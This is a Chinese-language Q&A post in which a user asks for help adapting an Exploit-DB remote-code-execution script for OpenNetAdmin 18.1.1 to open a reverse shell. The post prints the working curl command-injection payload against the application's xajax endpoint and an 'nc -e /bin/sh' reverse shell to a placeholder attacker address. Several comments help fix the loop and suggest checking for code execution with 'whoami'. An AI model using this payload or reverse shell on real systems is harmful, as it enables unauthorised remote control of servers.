【发布时间】:2020-01-27 08:51:55
【问题描述】:
我在 OpenNetAdmin 18.1.1 的exploit-db 中找到了exploit
我必须调整这个脚本,让它对我有用,但我没有完成。 这是我目前所拥有的:
URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
输出只是:
{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }
我在语法上有点挣扎。
我做错了什么?
【问题讨论】:
-
你为什么要这样修改漏洞利用脚本?如果您在exploit-db.com/exploits/47691 看到原始的,它只回显一个 $ 符号,模拟一个 shell,要求您在下一行中启动一个命令,curl 利用漏洞
-
你需要更清楚地解释你试图用这条线做什么。如果您想将
nc的输出读入cmd,那么可能是read cmd < <(nc -e /bin/sh xxx.xxx.xxx.xxx 4444) -
好吧,也许你希望 nc 命令成为你的 cmd,在这种情况下,只需执行 cmd="nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "。我猜你不需要 while 循环,因为你只想启动那个命令
-
我想用这个
nc -e /bin/sh xxx.xxx.xxx.xxx 4444创建一个反向shell 这个漏洞通常如何使用?您将如何使用 t? -
看起来您刚刚在 Web 应用程序中运行 /bin/sh。尝试更改要在远程服务器上运行的命令。例如“uname -a”或“whoami”,以查看您是否有 RCE。 (如果使用此漏洞,Web 应用程序没有响应任何内容,则该命令可能正在运行,在这种情况下,如果您尝试使用反向 shell,可能有防火墙阻止您)
标签: linux bash syntax exploit shellcode